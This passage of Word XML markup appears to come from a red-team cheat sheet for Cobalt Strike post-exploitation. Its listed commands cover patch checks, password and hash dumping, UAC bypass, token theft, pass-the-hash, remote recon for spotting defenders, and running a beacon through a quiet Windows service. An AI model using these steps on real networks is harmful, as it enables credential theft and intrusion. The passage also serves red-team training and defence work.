      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p858fpxy9est" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch Activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Determine when the last update or patch occurred on the system. If the system has not been patched for over a month, perhaps an exploit exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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13E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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wmic qfe list</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Lists updates, type of updates, and dates of </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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updates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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141">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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systeminfo</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:Returns patch information. Do not run remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_at1knky320du" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passwords &amp; Hash Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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Be aware that passwords found on a local system for a user will often be reused throughout the network for more privileged accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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145">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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hashdump</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:CS command that dumps all login password hashes on </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>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the local machine. Requires a system level account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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148">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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wdigest</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:CS command that recovers all login passwords from </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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memory that have been entered since the last reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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14B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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logonpasswords </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:CS command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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14D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wtkz8hpl4x4h" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rvti6igule5e" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Runas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
      <w:pPr>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CS command that runs a process with the privileges of another account. It’s usually used to attempt to run a callback binary with the credentials of an admin but in the environment of the user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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152">
      <w:pPr>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runas &lt;domain&gt;|&lt;workstation&gt;\&lt;username&gt; &lt;password&gt; &lt;c:\path\to\binary.exe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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154">
      <w:pPr>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There are a few caveats to this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It must be ran by an account with user level privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Both accounts must have access to the binary. For instance a binary in a public folder on the computer would be sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Be sure to specify the full path to the binary</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bnpshiyvokwi" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypass User Account Control (UAC)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">
      <w:pPr>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Normally when an admin tries to perform a SYSTEM level process, Windows will stop the admin with a pop-up (UAC) to ensure this SYSTEM level action is legitimate. The same may occur if an attacker tries to elevate to a SYSTEM level authority permanently. The following command will assist in this elevation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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15B">
      <w:pPr>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bypassuac </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:CS command that elevates an administrator's status </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>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to a high integrity, SYSTEM level status without tripping UAC protections within windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_z16xlegyuj9x" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:i w:val="1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tokens</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>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steal_token &lt;PID&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:CS Command to steal tokens from </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015F">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="720"/>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the specified PID. Must be SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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161">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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pth &lt;DOMAIN&gt;\&lt;User&gt; &lt;hash&gt; </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">:CS command to pass the hash of </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="720"/>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another user. Must be SYSTEM. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000163">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:contextualSpacing w:val="0"/>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164">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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make_token &lt;Domain&gt;\&lt;User&gt; &lt;password&gt;</w:t>
        <w:tab/>
        <w:t xml:space="preserve">:Make a token for a remote </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:ind w:left="3600" w:firstLine="0"/>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session. Uses plaintext passwords. Can be executed with just user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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167">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>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168">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2rds7z6c87gd" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-Execution Recon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>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Before using credentials to jump to another workstation via remote execution, it is a good idea to check to make sure your credentials work on the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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16C">
      <w:pPr>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Running tasklist remotely can be extremely helpful. Not only are credentials verified in the process, but an aggressor can learn if the user is logged in, if a defender is running a binary like Wireshark, or if the workstation is locked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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16E">
      <w:pPr>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tasklist /s &lt;IPofTarget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6lixofcjhmyn" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>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Running a binary on a remote system directly can be problematic. The following methods allow remote execution on a system after the aggressor has secured appropriate credentials.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xv51okun5nkw" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:fill="efefef" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">
      <w:pPr>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Use the sc command to modify a service on a remote target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">
      <w:pPr>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000175">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload a System level beacon binary to the target system using previously acquired credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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177">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Locate a currently running service that does very little or start a Windows service that will not attract increased scrutiny.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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179">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examine the state of the service in question.</w:t>
      </w:r>
    </w:p>
